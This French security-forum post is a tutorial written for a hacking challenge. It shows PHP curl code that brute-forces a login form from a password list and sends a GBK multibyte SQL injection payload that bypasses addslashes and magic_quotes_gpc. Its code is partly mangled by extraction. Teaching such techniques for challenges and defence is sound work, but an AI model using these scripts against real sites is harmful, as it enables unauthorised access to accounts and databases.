• STATISTIQUES
  • Il y a eu un total de 0 membres et 54675 visiteurs sur le site dans les dernières 24h pour un total de 54 675 personnes!
    Membres: 2 605
    Discussions: 3 579
    Messages: 32 816
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [EN] w3challs
    Ce site propose différents types de défis informatiques: piratage, craquage, cryptographie, stég...
    Hacking
    [EN] Dare your mind
    JavaScript: 6, Crypto: 44, Stegano: 36, Logic: 13, Special: 27, Science: 11, Realistic: 7, Programming: 10, Crack It: 6,...
    Challenges
    [FR] Microcontest
    Cryptographie: 7, Mathématiques: 8, Image Son Vidéo: 5, Intelligence artificielle: 3, Réseau: 2, Divers: 7, Phy...
    Challenges
    [FR] InfoMirmo
    Apprentissage de l'informatique par l'intermédiaire de challenges de sécurité. Venez app...
    Hacking
    [EN] Astalavista
    JavaScript: 1, Exploit: 2, Crypto: 34, CrackIt: 15, Stegano: 8, Programming: 12, Logic: 36, Special: 6, Science: 4, Info...
    Challenges
    [FR] Root-me
    Script: 5, Système: 20, Cracking: 16, Cryptanalyse: 17, Programmation: 8, Réaliste: 11, Réseau: 10, Stéganog...
    Challenges
    [FR] Hackfest
    Le Hackfest est un évènement de sécurité et de piratage informatique au Québec reg...
    Hacking

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
[Php] bruteforce de login et bypass de addslashes et magic_quotes_gpc
17-11-2011, 16h11 (Modification du message : 19-11-2012, 19h17 par InstinctHack.)
Message : #1
CyberSee Hors ligne
Admin fondateur de N-PN
*******



Messages : 1,721
Sujets : 287
Points: 157
Inscription : Jan 2012
[Php] bruteforce de login et bypass de addslashes et magic_quotes_gpc
Bonjour à tous ;-)
J'aimerais vous partager un petit script que j'ai créé pour réussir un challenge de programmation. Le défi consistait à attaquer un formulaire de login avec une librairie de mot de passe. J'ai donc créé un code qui utilise les fonctions curl de PHP pour envoyer mes essais.

Étape un, créé une variable qui contient tous les mots de passe
Code PHP :
$passe "test1-*-test2-*-test3"

J'aurais pu les entrer aussi dans un array mais ça dépend comment la librairie ce présente a vous. L’important c'est d'être capable de facilement looper chaque mot de passe de la liste.

Une fois la liste entrer en variable, j'ai utilisé la fonction explode pour la transformer en array
Code PHP :
$password explode ('-*-'$passe); 

Le séparateur que j'ai utilisé dans ce cas est -*-. La raison c'est que cette chaine de 3 caractères n'était pas utilisée dans aucun des mots de passe de la librairie donner avec le challenge. Pour les librairies plus gros, je vous conseille d'utiliser un meilleur système pour vous assurer que chaque mot de passe est bien entré dans l'array.

Étape deux, on loop les mots de passe avec foreach
Code PHP :
$url 'http://[...]/login.php';

foreach (
$password as $value){
 
ob_start();
 
$ch curl_init($url);
 
curl_setopt ($chCURLOPT_POST1);
 
curl_setopt ($chCURLOPT_POSTFIELDS"password=$value");
 
curl_exec ($ch);
 
curl_close ($ch);
 
$p ob_get_clean();
 if (!
strstr($p"w00t") ) {echo "Le mot de passe est: $value<hr>$p<hr>"; }


Dépendamment du nombre de mots de passe que vous voulez essayer, il se peut que votre script soit arrêté par le serveur ... Si c'est le cas, vous pouvez ajouter un ini_set qui augmentera le temps d'exécution autorisé
Code PHP :
ini_set(max_execution_time$temps_en_seconde); 

Bien que le PHP ne soit pas recommander pour brute forcer ce genre de formulaire, ça reste tout de même une option possible bien que peux pratique. Par contre, il est a noter que curl peux également être utiliser dans une panoplie de faille par exemple, le bypasse de addslashes et magic_quotes_gpc dans le cas d'une tentative d'injection SQL.

Code PHP :
$url     "http://www.victime.com/login.php";
$ref     "http://www.victime.com/index.php";
$session "PHPSESSID=abcdef01234567890abcdef01";
 
$ch      curl_init();
 
curl_setopt$chCURLOPT_URL,            $url     );
curl_setopt$chCURLOPT_REFERER,        $ref     );
curl_setopt$chCURLOPT_RETURNTRANSFERTRUE     );
curl_setopt$chCURLOPT_COOKIE,         $session );
curl_setopt$chCURLOPT_POST,           TRUE     );
curl_setopt$chCURLOPT_POSTFIELDS,     "username=" chr(0xbf) . chr(0x27) . "OR 1=1/*&submit=1" );
 
$data curl_exec$ch );
 
print( 
$data );
curl_close$ch ); 

Les fonctions chr(0xbf) et chr(0x27) sont égales à ¿' ce qui permet de créé une injection SQL quand la librairie de caractère GBK est activée.

J'espère que ce tutoriel vous a ouvert les yeux sur les possibilités d'exploitation grâce a curl. Si vous désirez en savoir plus sur cette fonction, cliquez sur le lien suivant:
http://ca3.php.net/manual/fr/book.curl.php

Soyez intelligent et restez WhiteHat!
Par CyberSee
+1 (0) -1 (0) Répondre


Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  [python] BruteForce InstinctHack 5 375 25-02-2013, 03h27
Dernier message: InstinctHack

Atteindre :


Utilisateur(s) parcourant ce sujet : 1 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut